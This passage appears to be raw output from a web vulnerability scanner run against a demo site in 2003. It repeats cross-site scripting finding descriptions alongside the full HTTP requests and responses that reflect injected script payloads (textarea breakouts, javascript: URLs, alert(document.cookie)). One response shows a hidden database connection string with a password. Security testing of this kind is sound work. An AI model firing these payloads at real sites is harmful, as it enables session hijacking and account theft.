<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=</textarea><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3990
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center></textarea><script>alert('XSS')</script></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=<attack></textarea><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4001
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>1"style="background:url(javascript:alert('XSS'))" "</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /plink.asp?a=</textarea><script>alert('XSS')</script>&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 206
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = </textarea><script>alert('XSS')</script></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=<attack></textarea><script>alert('XSS')</script></attack>&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=</textarea><script>alert('XSS')</script>&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 389
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = </textarea><script>alert('XSS')</script></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=<attack></textarea><script>alert('XSS')</script></attack>&txtLastName=Swinney<script>alert\('XSS'\)</script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=test@<script>alert(document.cookie)</script>.com&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:51 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 364
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = test@<script>alert(document.cookie)</script>.com</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=<attack>test@<script>alert(document.cookie)</script>.com</attack>&txtFirstName=Joe&txtLastName=Swinneytest@<script>alert\(document\.cookie\)GET /join.asp?name=&email=&surname=&house=&street=>"><script>alert('XSS')</script>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=<attack>>"><script>alert('XSS')</script></attack>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"><script>alert("XSS")</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
